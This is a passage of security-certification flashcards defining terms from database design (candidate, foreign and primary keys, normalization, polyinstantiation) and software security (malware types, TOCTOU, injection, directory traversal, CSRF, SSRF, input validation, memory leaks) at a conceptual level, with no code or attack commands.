Software Assurance Maturity Model (SAMM)

A

An open source project maintained by the Open Web Application Security Project (OWASP). It seeks to provide a framework for integrating security activities into the software development and maintenance process as well as offer organizations the ability to assess their maturity.

107
Q

reasonableness check

A

The crafting and use of special test suites of data that exercise all paths of the software to the fullest extent possible and comparison of the results to the known correct expected outputs.

108
Q

candidate key

A

A subset of attributes, columns, or fields that can be used to uniquely identify any record in a table. Aka alternate key.

109
Q

foreign key

A

A primary key from another table used to cross-link or express relationships between the contents of two tables.

110
Q

normalization

A

The database process that removes redundant data and ensures that all attributes are dependent on the primary key.

111
Q

polyinstantiation

A

The event that occurs when two or more rows in the same table appear to have identical primary key elements but contain different data for use at differing classification levels. Polyinstantiation is often used as a defense against some types of inference attacks.

112
Q

primary key

A

A specific key from the set of candidate keys that is used as the main differentiator between records. Every record must have a unique value in its primary key field.

113
Q

referential integrity

A

Used to enforce relationships between two tables. One table in the relationship contains a foreign key that corresponds to the primary key of the other table in the relationship.

114
Q

tuple

A

(1) A record or row in a database. (2) A collection of related data items.

115
Q

cardinality

A

The number of rows in a relational database.

116
Q

degree

A

The number of columns in a relational database.

117
Q

database contamination

A

What happens when data or records of different values, classifications, security domains, and the like are commingled or mixed together. It can be a form of integrity and confidentiality violation.

118
Q

multipart virus, multipartite virus

A

Malware that performs multiple tasks and may infect a system in numerous ways.

119
Q

stealth virus

A

Malicious code that attempts to avoid detection by masking or hiding its activities.

120
Q

polymorphic

A

An attribute of some malware that allows the malware to mutate and appear differently each time it crops up. It is malware that modifies its own code as it travels from system to system. The mutations make it harder for malware scanners to detect (and react to) the unwanted code, since the signature of the malware is somewhat different each time it infects a new system. Aka polymorphic virus or polymorphic malware.

121
Q

encrypted virus

A

A virus that uses cryptographic techniques to avoid detection. In their outward appearance, they are quite similar to polymorphic viruses—each infected system has a virus with a different signature. However, they do not generate these modified signatures by changing their code; instead, they alter the way they are stored on the disk.

122
Q

Trojan (previously Trojan horse)

A

Any application that masquerades as something benign to get past scrutiny and then does something malicious. A malicious code object that appears to be a benevolent program, such as a game or simple utility that performs the “cover” functions as advertised but also carries an unknown payload, such as a virus. One of the major differences between Trojans and viruses is that Trojans tend not to replicate themselves.

123
Q

worm

A

A form of malicious code that is self-replicating but is not designed to impose direct harm on host systems. The primary purpose of a worm is to replicate itself to other systems and gather information. Worms are usually very prolific and often cause a denial of service because of their consumption of system resources and network bandwidth in their attempt to self-replicate.

124
Q

endpoint detection and response (EDR)

A

A security mechanism that is an evolution of traditional antimalware products. EDR seeks to detect, record, evaluate, and respond to suspicious activities and events, which may be caused by problematic software or by valid and invalid users.

125
Q

user and entity behavior analysis (UEBA), user and entity behavior analytics

A

The E in UEBA extends the UBA concept to include entity activities that take place but that are not necessarily directly linked or tied to a user’s specific actions, but that can still correlate to a vulnerability, reconnaissance, intrusion, breach, or exploit occurrence. Information collected from UBA/UEBA monitoring can be used to improve personnel security policies, procedures, training, and related security oversight programs.

126
Q

time of check (TOC)

A

The time at which a subject checks on the status of an object.

127
Q

time of check to time of use (TOCTOU, TOC2TOC, TOCTTOU, TOC/TOU)

A

A timing vulnerability that occurs when a program checks access permissions too far in advance of a resource request. A type of exploitation in which attackers abuse the predictability and precision of task execution to cause a loophole in security filtering or authentication. See also race conditions.

128
Q

rootkit

A

A special type of hacker tool that embeds itself deep within an operating system (OS). The rootkit positions itself at the heart of an OS where it can manipulate information seen by the OS and its users.

129
Q

injection attack

A

Any exploitation that allows an attacker to submit code to a target system to modify its operations and/or poison and corrupt its dataset. See SQL injection, LDAP injection, DLL injection, HTML injection, and XML injection. Aka injection vulnerabilities.

130
Q

blind SQL injection

A

A means to conduct a SQL injection attack even when there is no ability to view the results directly.

131
Q

DLL injection

A

An advanced software exploitation technique that manipulates a process’s memory to trick it into loading additional code and thus perform operations the original author did not intend. A dynamic-link library (DLL) is a collection of code that is designed to be loaded and used as needed by a process. Aka DLL hijacking or DLL injection attack.

132
Q

insecure direct object reference

A

If an application does not perform authorization checks, the user may be permitted to view information that exceeds their authority when directly accessed.

133
Q

directory traversal

A

An attack that enables an attacker to jump out of the web root directory structure and into any other part of the filesystem hosted by the web server’s host operating system.

134
Q

file inclusion attack

A

A web-focused attack that builds on directory traversal. Instead of simply retrieving a file from the local operating system and displaying it to the attacker, file inclusion attacks actually execute the code contained within a file, allowing the attacker to fool the web server into executing targeted code. Variants include local file inclusion and remote file inclusion.

135
Q

cross-site request forgery (XSRF, CSRF)

A

An attack that is similar in nature to cross-site scripting (XSS). However, with XSRF, the attack is focused on the visiting user’s web browser more than the website being visited. The main purpose of XSRF is to trick the user or the user’s browser into performing actions they did not intend or would not have authorized against a targeted server, system, or site. Aka client-side request forgery (CSRF).

136
Q

request forgery

A

Attacks that exploit trust relationships and attempt to have users unwittingly execute commands against a remote server. They come in two forms: cross-site request forgery and server-side request forgery.

137
Q

server-side request forgery (SSRF)

A

A clever exploit where a vulnerable server is coerced into functioning as a proxy.

138
Q

input whitelisting

A

The most effective form of input validation in which the developer describes the exact type of input that is expected from the user and then verifies that the input matches that specification before passing the input to other processes or servers. Aka input allow listing.

139
Q

input blacklisting

A

A means to control user input. With this approach, developers do not try to explicitly describe acceptable input but instead describe potentially malicious input that must be blocked. Aka input block listing.

140
Q

data minimization

A

The reduction of data collected or stored to the minimum necessary to perform essential business tasks.

141
Q

resource exhaustion

A

When applications are allowed to operate in an unrestricted and unmonitored manner so that all available system resources are consumed in the attempt to serve the requests of valid users or in response to a denial-of-service (DoS) attack.

142
Q

memory leak

A

What occurs when a program fails to release memory or continues to consume more memory. It’s called a leak because the overall computer system ends up with less available free memory when an application is causing a memory leak.

143
Q

memory pointer

A

A commonly used concept in application development. Memory pointers are simply an area of memory that stores an address of another location in memory. See pointer.

144
Q

pointer dereference

A

The programmatic activity of retrieving the value stored in a memory location by triggering the pulling of the memory based on its address or location as stored in a pointer (a type of variable that holds an address—that is, a memory space location). Aka object dereference.
